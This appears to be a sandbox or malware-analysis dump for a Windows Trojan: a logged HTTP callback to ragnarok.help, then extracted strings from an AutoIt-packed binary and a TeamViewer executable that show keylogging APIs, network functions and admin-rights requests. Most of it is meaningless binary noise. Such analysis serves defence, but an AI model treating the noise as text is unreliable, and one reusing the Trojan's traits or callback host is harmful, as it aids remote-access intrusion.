Host: ragnarok.help
HTTP/1.1 200 OK
Date: Mon, 26 Jun 2017 22:39:11 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Content-Length: 2
Content-Type: text/htmlokHTTP/1.1 200 OK..Date: Mon, 26 Jun 2017 22:39:11 GMT..Server: Apache
/2.4.7 (Ubuntu)..X-Powered-By: PHP/5.5.9-1ubuntu4.14..Content-Length:
2..Content-Type: text/html..ok..
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
r%f;M
j.Xf;
j.Zf;
PSSSSSSh
Gt.Ht$
.ku`8iu~fiu
kernel32.dll
?#%X.y
GetProcessWindowStation
operator
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \usupport for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
WSOCK32.dll
VERSION.dll
WINMM.dll
COMCTL32.dll
MPR.dll
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
USERENV.dll
UxTheme.dll
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
KERNEL32.dll
OpenWindowStationW
SetProcessWindowStation
CloseWindowStation
MapVirtualKeyW
EnumChildWindows
EnumWindows
VkKeyScanW
GetKeyState
GetKeyboardState
SetKeyboardState
GetAsyncKeyState
keybd_event
EnumThreadWindows
ExitWindowsEx
UnregisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
USER32.dll
SetViewportOrgEx
GDI32.dll
COMDLG32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
GetCPInfo
zcÁ
n..GGHHH
n...GGHHH
n ....HGHHHH
n ....G.HHH
~~~~{~{{{{n!! ....HGHHHH
n!! .....HHHHHH
!!! ....GGHHH
!!"".....HHHHnv
"""...-.nv
^s.Gi
I.po`zu
-.gR7K$
_.xbU
97%Uo
$6VÈF
8'.Hy
%xsHp
66.Po%y
{<-d}5^.vSP
O4\%F
9V3%X
n.uy
igÕ0M
qG-c}U
J.Jav
*%S1(
!LnX(_%s
K.QpSTW5i
\qlBŸA
k%1xx
j.KM(,0d)
*_c;y9ð
R6pxB%D
~O@%F
9p.YQ/$
5.oO'!z
-P}av=b
`H.bD|g
>v%X[
.JbA%L
t.tUX
S8gvR%X_A$
_%xAa*
.QG!K
q.Ayr
r%xpW
%xp1H
4h.IqW8
j.er-
H%X!o
.BVM:Cd&4
.).iS
>.MNe
If>%D
>Xô
.Ba}p
c.DCJ
LSl(%S
jcMD
l%u7|
LZ.PS
.bC*M
PR*%U
.XBE*
fI.mP
,o.dQyRA/fQ5[
6F%f-
%FvI`
].gvi
K.vhSe
Qlp%D
4\Î
$.My
.`%Sv
?t3%s
mt.jD,
2.hF;(
%XOg[
]e.wd
s/%d@
$.aP43K
.ZuYtee
;-7}c
%d@{Fz.nF/`
o#
Iy?%U
4Z@"~.OA
.pqQtu
*%f-_,|g
}}Qx
.dZAL
Yu.zAse
IRR.Lc
wBj.Mj;c
].eb$
.Qny\
u.OIH;
ULN%c
.KAoN
V%u"s>ra
%sMi{*n.OXu3
^@9%c
.BPka]
,`cO.Tu
.PfHd
I/.Fyj
2.TG/
.joJQ{(r.wc
0dx.vm
5&4'G4.Jf7
.bMCH-1
s/l%f
E[Enw%f
9.Fj<K`
X*@2En%uq
*.eD_
'D.TT$zb
[.Er`_J
.SU:d!)3
*%xk:W
%fg1~rkKy
UrLq
Up5%XF
.QP[E
.qg8a`
UDpr
KeYR
iI%F~
b%DoC
M7!%Sr
%xekoo'`
;%u&p
Q-.Ih
y.oK3
8A.JZ:t
1X?.St
6%u~<
P%.DJ2
".ii=s
_.BV;u
~0y0l.PoX
j$.Tf(
.GlSC
Rn.UL
j.Ine
soG%f
zb.obJ
{.akyp.Ze|_
&Y.Cp
f:%s-~
CF.oy
i^*-%U
Tcpy
%9xD=Y
%UJG=c
K@%f<?Kw
XX[%Dv
f6QS.Vy
\Y.wM
.Hk5d
-A(X@%dj
Ã[|
^NqQ,18-.Odm
.cx\<
ik%c%|
.OIE'
!.eH8
)|.SR
(I%u{6g].If3%
=mV%x
~3
-7Xc}
%%dR,
W%ubxt
?-D}T
T.sHF
'%XX{<%F-^Ft(%
m|]%xC
fr%S_i
%ukv9
ef.TZ
{}%x9l"ýN
>.GD&o
\.eIs/N
eO.lY@
{d.RB-j%d=$
}Dc.jw
Rf%cTt<
.hPcF;
.Bt/<
OP.MG
q6.YT
yT.Hu
rU3.eH
v%f]G
.OC@*
.kXf3
.DLFyQ
D%.Iw3
y[qc.cw
|#
.FK78WG
#g~.RsK@
_Y y%x
y.Tn!
@yB
d5%D[
.WuT#
%u/f~
n.SCn
2{.Pn5.ltn
oOF%D
?F.Uv
b.rV&*[
~2b%Co
@.xB%Q
ýSg
RD.pp
.gK95
9FJ%U^~
1k.MR
F?/%d
FC.nM
!.Xl<
v$mR.pK
%sRwq
.PKs}
[H
4\%s}C
#o.VW
~>.Slv
E.JcB
z9%.d
.ZX$Y`
=E.TK
S.CE&
7Sm%s
Y}%u<
.ehLX
>~.hH
l.vf[
ZO%Sc
9H:DKEy
x&".Es
.lXp9
%DToy
c>u`0%C
W%6.zwk
%s}Ru
m=%d"
zmL79%X-.a
6.ZWd
-hQ2}
%UNM[
d%Shr
pTCpg
>y.sP
B(%s]
gHW.DS~
.Utkc
!V.gz
{%.ItYk.sr
jwx
÷'B
~*.uSl
.EiNBOE
b.mJS
./t%D
.RMhs0
DwzRa%F
$.XF%
.YS8A
^.FQvqc_
'f..rY*
-vo}Gir{.cVlEa
.zp_#
%uPsG
<F};.XQ
W?%cN
7)T.pf
0(û
`.jD3
F.PPz
x.=%s
0CRTr
.tPUj2
][.sQzTX
&.szq&
wLy.tz\:
(%StD
`-k}l
j.xn<
-.dmj
.ssAU
.Fbu1
B^.cs
=@ 8%S
7%fxY#
`to.WJ
u,.po
.dHOO
&%X=pBTEU
0^,!_:<_
Qw.ENO)
#.yy'
-]-i}
M|o%f
SQL_#
uU~]%x
-&.Kl
K8.kxXk
%fs<UE$.
I?_W5.qH
7V.IT
%FVZ7
[.Rqm
ye%Sc(
Môz
!6.Dm
(Sql`
HD%C*
'cExE
.TBy(
6^)-.oV
*6X.Mj
KAb?%c
b?%dT
Cd,.sM
TL,%U
uQ.QF=
*j.mVB
%d>8[
F .QT
v.vCo3
.xYnw
-Q^.IY
%UL#go
u.xM-
^>õE_
YW%X5Y6
G-t}l7la1.
.Eqeiw
*.DXIY
4.Iw<9
.th17
.As #`
P,'%xJ
f.MPS
Z.fs]L
K(-qg}
%C|M}
fwYU]@%f
G'/.DeB
tD%F,
|?R.Xm
s.aqW
(D%s]
.kl!u
w1/%x
VF>%D
L%C}y
)l%C%
IX]%s
.gf`e
jPz.AYO
Qx2.Xk
.qsOKo
jR.vm
<%Cz~
N?.GZ
(%U .
.Qu"S2
b*c-a}[k
|8.cv
c^.OK
0D.ED2
Ccz[%F
:.aGA0m
K:\dgP#E~Y
_0.PX?
g^.eG
.fM]'
_0.AW
yB%sa
_.Uv
fhjkEYg
$.ee~
d.Vzi
UdPm
2`?
#..aA
t9.WP
E%xc~%
wõR
&%f 7m
?iA.aS4
H%C)H
`%F&h\
LW-%x
;f.ZQT
,.iIn
{@!.Ew?8BþG
N.RpW
n%s:kO
G6}CMd
.fv48
=!=O.dZ
%XWv3bSms
CS%D`k)@
%\.HG
%ulmL
/?7z%u
@.YnjIk:
m.VW{&!.DlH*;
.Om]A
crtG
8.pFEp"
%Xx;=
W#1%f*
u%sv@u0a
RA.vw
-.xLT
.PjkQ
%fH >
.Dat*n,
5%FOZ
2.rL}r
zbb2%%x
_N.UL
^i!%DTv*Og
!.NH@1Y9
.nyOX
r.DF&
5U.iA
P.It5
&Ïm
GT.QE
a.Pf1
.rzfD
2JG%d
$.ezpm)?}
sC{%s.Ej'V
4-h}!
]EF.wMbT
F).dZ
%S#/&
.dM^v
.cB/i
]%fU)
{b%0s_B.eZE
\%U-d
}2.Qgj
9.qRB
r=%Un
y!(%c
@.cgw
LX%u^
.bG>#
%UzmE/
8T3!=%f
Uo.Ps
8|.Zn
Yxc0qsSh
.Uw{&9iD.Sq)t9#x
M{.RLv2.Ni=
.jk?|
x8.Ru
6.Ip"n#
R.JFI
\<%s"
?R.FQZ
nQ.Or
.Upg24uj
.Ys-1
}.OxV
SrE?6É
I7%WtG%dT
|;ÔB
.ZVJUV't
YA/%D
j.oUi.
o,.rB
W(%xQ
%u8"VK
%9s6zt
_g:%c
)M3k.LA
E:P%D
K.YhA_
GbÒ
}3.kku
%s?#g
ICM.DW#
'I.Nisu
$.sbS
[8.cK
H*.gw#
<_j%c
%Fi=1
.Ff\>wE
C.CEn
)7;]%4X
Y%Z%X F
ÑiK
_.rM?
?.RG9
-.ZRw
%D,0t0
qT9t%x25~
c%6s,5
<HB.vR
%CIw=w
4\$f.vBj
"O.rT
B@.Ux
.Yo@S!
.Yz C
<.xD`
XBa%s
Crtu
.ZdTN#
]lt?%d?>b
d.Gs~
87.gD
BN.wx
oE%Uj
LBd.XC
k.YDQ)
%U}!pTMt
%F_tV
[>%F]B
cW6Çb%YJ
.yMEE
.YX0'
ED%Cu8
%DH5Z@cU
L-pL}K
gw_9G%SsP
'.bkyB
.ra6h
D,y FÚ
%sC`7
.WT}g
y~\.if
B%DXz
]-.IP!&1
%`.sw.
d.B,{%fLp$.BQ1$R
CY=YL
%SUHi
%u3d un
;.jsa,
I}^D%f
c.Qae
sFX.DX
%dkj`
1-M%Uz
;7g%x
.Pg<7
e@h-G}
.HziF
.Wy*@
rK.mtQEA
ooÃZzz
wn.Hzl
vdMsg
.Dl:FD
%|!.tk
5.xl6
8YC%S
f%cX^
.XlN-yL
sf`%c
nL6bEl.xa
N7-
S(x.gLf
xQWeB
iV.sT
\".gw
.Ji4_
.Rl@!7
/=.En%
Z.Hw~8
z.ob4
~".Dg
6vm%f;$
%f&{isfEXe?
\Z.pF.?te\sP
l47%C
{%.fG]>_.Fz&
2I5jL%C
#.QmB
uv.UT\
.zO=m
.UzWQ
HGo%f
0%7S'q
.Uajo=
;|.LK
x.Tr6q
%8X.`$
WEbA
.iuUD~
n\|.eQ
x>* i%cZ
/DSI%d
#t!%d
!%5S u
7ÚL
`?.zq
rJ.Uq
fF%X'
5U8.Sh
Fo.EEZ7
vy%%s
c)%UN
PTO%7U.
..Ib}
c9e%D
2J.mvD_
.Oswe
Ko%dY
^LÅ/
S3%Dwr
W%xk<
t.JQL
9.cShP:
Kz.Lz(
A:\P:
SqLJ
4.Za"X
)c%X'
.QZ=:
WE%c
U>.mh
iv.UH
.oI1<
c*G.Ie
@1h#.EG
zkX%Fy
}K .ud
t4%uT
T.bOpA
p.ih@x8
Ox7.RO,R
x.JHq
Dj
%c[n6`#
e.AdOL
y'S.JS
?K-9}
h.RF0
Z .lDc
4N.Fy
a.sl-U
:`cRt
A.s%S
Z!Z%u
G%Fp4
'.KaJD&
%DRlx
Vudp
W-u.lE
g@%F
T .xG
.VN-xc
TF~
0.uBY
..BZn
&.lPR
b.FHa
.UC#i9
.Qk)[
N{O%uo*{%C\J*.fCfj
.iu13
zY)%U3
Z.P'%D s%
B.wr/
@4.Zd
-%DQB
W.ShG}
/F'-.sj
-lnA}>
%uc-g_
7.lq9
.GZ<Q
7-f}2
>~A&.UBTK
Z%uWY
7<.TR
m.FZQ
=.rV{;n.Uk
w.Ve}
%UWu*v
C.sh_
gv.us::
.HQl;
#0L%sO
9b#:F%Sz
.dAyR
l.LdU
T %U^
R.xzS
.EOi# 6
:Q.BY
u.ae-n
.umwK
i.AUJ
PD%x&
cf1^%X
Y'.oN
;.Aybr
Y {=%sa%3U'N
_Xo.zf
.iI,5
.JUo4
(%f|r
.Lu#q
GdÉR n
VYc,%U
f}.eA
B8.VU)
.oRHx
65?.xQ
#<U8z.tE
%Fg!?"
"P.gP
".cI!
%Cm_0
rA &.ABw
x,sy%x
CRT2o
.TxdQ!
S .SF
G'.vk
i.dlOkJ
Fg.YN
dPL%U
1C-}.iq
A%SQX
%xGH-
(.MIc
27S.QN[
%0U`W^`5/9
D.EcI
cCu
.dA#:N
%SGUf_
`;.bJ
C%xc)
9R%U
1 ]%U
.KU{S#W.kqo
T.Bt.
-%UhH
X.kAW
bBy%U
y.Xg1
>j.Ax
.yw\~u
S2;K.ahy
lX:%fRb
.PPVP
7M.EAsA
.hSvg
<L%dX*
%?.cc
4/.Of
D.ZPs$%
.zO_EI*
2Mv.JI3
%D/ {`Fkt?%DJ
.nbb~r
.Ib,c
NTn.Yc
.JD~g
NxDX.pf
Bh)%X
[*.gn
@.qo_
(zTM.tka
C=%d?
G-J}Y
H2.kb
=.QD9
@.VvRr
&%4%c_
.rFBA
.sV.5
5K%c%]Tt
sOrv%U
GtI.Kb
.xxlm
p5_.pN
.bn%iS
"B.bx<
.gMs%
.pkA>
.LFX]i
T%dGn"
%U`97
H%u*8*
8.RgL
.Ft);
t%Uw!
.NLU@
8.Mi`7
Qs?Ý
RcP.BR5
P{%6xYqCmD\V(
g~?%D
M<&
pY%UtH<#
%S`U3?(
j.TL:d^&
SV#CMd
JCWEB.
.fHIP
MsG6a
Jk%xj$
'.|
Q.vl?
y.rf^
V*.Wrni
I}.RyG
.D.lml
#.ep-
8%xpLz
r"À
|].hNb
.UC3d
!I:%x
.ufgr
.Yq,7qN
Rj.fQ
%XfAN
T.KU,$
.uZ(j
K(x.ex
YkL%s
%CV\)
d0.ih6
hbm%C$
.KXuJV
F.pi}|`
rnUO.Hg
.Flgb
H%D (
T.wqB
%3s4SX2
\%0s2Zo
.VFR|
.Qw0RB
Bb.zZ
6H -%s>S
Ï^P
%9S<bV#
%s\i6
9%uLT
Uc.oI
_/%sC
> ).DJO
q(%D;4
e:\uk
-u.spbo
ZZB#
SC.ra
.%XjX
$N%S^
q0.VzmU
j%sy'&gw
.SFq~v
u.eA< *
z@%Di
d.ZTvM
)%xR{.Bw(6m
G.taXk
^F.mm
:/%xG
.VD]Q
J.ZQ;$
HMxv.SuYg&
P$6.bh
r0x%0x_
aZd%C
`[^%xu
3%xDy
b,g%uPm
b<.ME
h%u.F
.DdF7[
H-a%cQ
`%dUj
aO.NBh_M
.WR5k
u%c!b
.RoxsFu
kf4%f
b[Eœ
Id.qR
G.IY$
fp%Sjd
0R.Oir
.gG}M
o".MJV
q.rp344W
Tu2V%fl
.CIT7E
^0L%c
1wu.fn
1x.IB
fh.Ki
q?{:l>.ev
.GB;I
D.cRP
|-%X_Q(F
{cF0%DQ.yrt)`
DLØ
A.jS>
SiV~.iM
.eV(/
TI.Tn
H.CQ'
_m}%S
.hR)\
.uC(.`
.OGl|
%Xhf?
.Lf&t
iW.mJ5x{%xsYf
|ZZo%u
#@.ds=
y'.qxj
yK.BXj
.TN"<
jN.gon
A.Cb.C
&o?%D
nL>.QI
KR.uh
E%xRW
0.oxT
|rp~.aA
C.kNI
%U{?->.Nb& q
4%UH-[
1K%FY~
1K7_EXe
.nr0\
.cB<1
^Y.Lg'
Vp.mW
G%UIN"
O7.NyYxt
,/.XY
.DvlA
3y%Sl1dZ
~tHw.fV
U.%fs
S.Xn.
`i.XFw
.nzb/
%Up^;2
Y%X`6[
NwEb
\%S.:f
h1!t5.Oz
.Gq7yv
_%S7*
gG%D/
j5GP.bo
zz2Î
]-R}E
%J.PkR
%CnES
c.yp@
.vpf/
=C%Cr
h.oKL
.Yd4l
&!.az
URLf
y.Kh_
k8oc.FO
K.Sq9
F|]%X
X5%X\
AgUJ'L.gMm
.ky"hi
,.Fu-
.rnBN8
c .Pe
Z,%UW
; -=%dH
\:%c %
-j6}'37_
v.gr1
.bX'n
W%d>8D<(
.Uv4k(l
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>;$;*;0;6;<;|;
=#=(=-=2=7===
3.44484<4@4
3&323^3|3
9 9$9(9,9?9
?#?'? ?/?3?7?;???
4"4&4*4.424
7)868=8=:
= =$=(=,=0=4=8=
0 0$0(0,00040
3"3(313]3
1!1%1)1-1115191=1
< <*<4<{<<$=4=8=<=
3 3(30383@3
/AutoIt3ExecuteScript
/AutoIt3ExecuteLine
CMDLINE
CMDLINERAW
>>>AUTOIT NO CMDEXECUTE<<<
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MAPKEYS
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDownDelay
SendKeyDelay
TCPTimeout
mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
789:;<=>?
APPSKEY
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
KEYS
\\?\UNC\
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 14, 2
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
c:\%original file name%.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
Teamviewer.exe_3496:
.text
`.rdata
@.data
.rodata
@.rsrc
@.reloc
\$$ \$4
\$0 \$(
|$( |$<
\$< \$8
?>7/6=<5.'
&-4;:3,%
$ 2981*#
9\$ ~.)\$
#*1892 $
%,3:;4-&
'.5<=6/7>?
D$ j.Xf
<0|-<:})
t%SSSSj
t.Vhi$\
L$tCP
!|$(!|$,
NPPSSh
tBSSh
uGSSh
9(t%C;^
!|$0!|$$!|$(!
>%u^j
9t$4~.Sj
VSSSSSSh
t.Ht Ht
t.hXc
t.hhv
$j"SShX
$j0SSh
$j8SSh
%SUUh
t.Ht"Hu
D$,Ht8Ht.HHt#
%f;CHu
9.usWh@
%f;A*u
u.jd^95|
\$@9\$0}
9_Xu%Sjdh
$SSh;,
$SSh<,
$SSh=,
$SShU,
$SShD-
$SSh],
D$.SP
udPW
t.Wj _ |$
j%Xf9
j.Xf9G
D$DPSSh
D$HPSSh
D$HPSSh(
FTPj
F\ FTP
<p%u[
j.Yf;
_tcPVj@
.PjRW
H.iL$0
WINHTTP.dll
WINMM.dll
gdiplus.dll
NETAPI32.dll
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
urlmon.dll
VERSION.dll
WTSAPI32.dll
USER32.dll
GDI32.dll
WINSPOOL.DRV
COMDLG32.dll
ADVAPI32.dll
^F{SHELL32.dllole32.dll
OLEAUT32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
SHLWAPI.dll
COMCTL32.dll
The repeat operator "*" cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator " " cannot start a regular expression.
Found a closing repetition operator } with no corresponding {.Can't terminate a sub-expression with an alternation operator |.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
A regular expression cannot start with the alternation operator |.
Invalid alternation operators within (?...) block.
More than one alternation operator | was encountered inside a conditional expression.
Alternation operators are not allowed inside a DEFINE block.
A repetition operator cannot be applied to a zero-width assertion.
left-curly-bracket
right-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.Invalid preceding regular expression prior to repetition operator.
WS2_32.dll
boost::filesystem::directory_iterator::operator
the option 'Ênonical_option%' is required but missing
unrecognised option 'Ênonical_option%'
option 'Ênonical_option%' is ambiguous
option 'Ênonical_option%' only takes a single argument
option 'Ênonical_option%' cannot be specified more than once
option 'Ênonical_option%'
the argument ('%value%') for option 'Ênonical_option%' is invalid. Valid choices are 'on|off', 'yes|no', '1|0' and 'true|false'the argument ('%value%') for option 'Ênonical_option%' is invalidoption 'Ênonical_option%' requires at least one argument
option 'Ênonical_option%' is not valid
the argument for option 'Ênonical_option%' should follow immediately after the equal sign
the required argument for option 'Ênonical_option%' is missing
the unabbreviated option 'Ênonical_option%' is not valid
the unabbreviated option 'Ênonical_option%' does not take any arguments
the abbreviated option 'Ênonical_option%' does not take any arguments
option 'Ênonical_option%' does not take any arguments
unknown command line syntax error for '%s'
Operation not permitted on an object without an associated state.
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
%S#[k
?#%X.y
operator
GetProcessWindowStation
MSIMG32.dll
SensApi.dll
MPR.dll
WebM Project VP8 Decoder v1.3.0
Truncated packet or corrupt partition %d length
Failed to allocate bool decoder %d
A stream must start with a complete key frame
UxTheme.dll
.niTV
{.pLa8.0.1 (r40318)
inflate 1.2.5 Copyright 1995-2010 Mark Adler
?PSAPI.DLL
CRYPT32.dll
imagehlp.dll
IPHLPAPI.DLL
Secur32.dll
USERENV.dll
WINTRUST.dll
MSWSOCK.dll
SETUPAPI.dll
boost::too_many_args: format-string referred to less arguments than were passed
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagboost::too_few_args: format-string referred to more arguments than were passed
hXXps://cloudstorageintegration.teamviewer.com/Content/revision.txt
The method or operation is not implemented.
E:\TeamViewer_Workspace\TeamViewer_10.0_Release\Libraries\Win\boost\boost/uuid/string_generator.hpp
invalid map<K, T> key
^hXXps://(profilepicturedl\.teamviewer\.com)/([a-zA-Z0-9\-_.~!*'();:@&= $,/?#\[\]]|%[a-fA-F0-9][a-fA-F0-9])*$
thread.entry_event
thread.exit_event
pictures.cache
BaseURL
hXXps://profilepicture.teamviewer.com/upload
hXXps://profilepicture-test.teamviewer.com/upload
TV =.=
TV d.d
boost thread: trying joining itself
asio.misc
asio.misc error
E:\TeamViewer_Workspace\TeamViewer_10.0_Release\Libraries\Win\boost\boost/exception/detail/exception_ptr.hpp
IPM.Note.MyMessage
RegOpenKeyTransactedW
webConnector8
ProxyPassword
Only execute TeamViewer without installing
tvjoinv8://
Password from TV Manager
Gateway for CustomQuickSupport
PasswordB64,B
Password,P
Base64 Password from TV Manager
Proxy Password Base64 encoded
Proxy IP and Port
Initiate TeamViewer with Control File (*.tvc)
Play a TeamViewerSession file (*.tvs)
Indicates that TeamViewer is started by web connector
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
E:\TeamViewer_Workspace\TeamViewer_10.0_Release\Libraries\Win\boost\boost/uuid/sha1.hpp
BuddyClientReceive.HandleResponse.OK: unknown request type
unsupported format
FileTransferProcessDialog.UpdateProgressInformation: path constructor of
FindFileThread.threadRun:
cannot initialize curlpp
https
7.43.0
&"( . :
.HTeu{{j"%/28;=#$019:>?
?=;97531/- )'%#!
"$&(*,.02468:<>
(0@@@` (0@@@`
"%%%)* "%%%)**
81*# 29$
,%:3;&-4
%c;w.
.BNW^h
!""#$$%%
d:d:d
d:d
Curl_poll(%d ds, %d ms)
Pipe broke: handle %p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
Internal error clearing splay node = %d
Internal error removing splay node = %d
rcmd
Pipe is full, skip (%zu)
Multiplexed connection found!
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol "%s" not supported or disabled in libcurl
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Found bundle for host %s: %p
Server doesn't support multi-use yet, wait
Server doesn't support multi-use (yet)
SMTP.
smtp
Illegal characters found in URL
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
Rebuilt URL to: %s
Please URL encode %% as %%, see RFC 6874.
Port number out of range
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
User-Agent: %s
Connection #%ld to host %s left intact
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with %s %s
No more connections allowed to host: %d
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
%5[^:]:%d:%5s
Couldn't parse CURLOPT_RESOLVE entry '%s'!
Address in '%s' found illegal!
Added %s:%d:%s to DNS cache
%s:%d
Hostname %s was found in DNS cache
%5[^:]:%d
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Unrecognized parameter value passed via CURLOPT_SSLVERSION
Server %s is blacklisted
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
HTTP server doesn't seem to support byte ranges. Cannot resume.
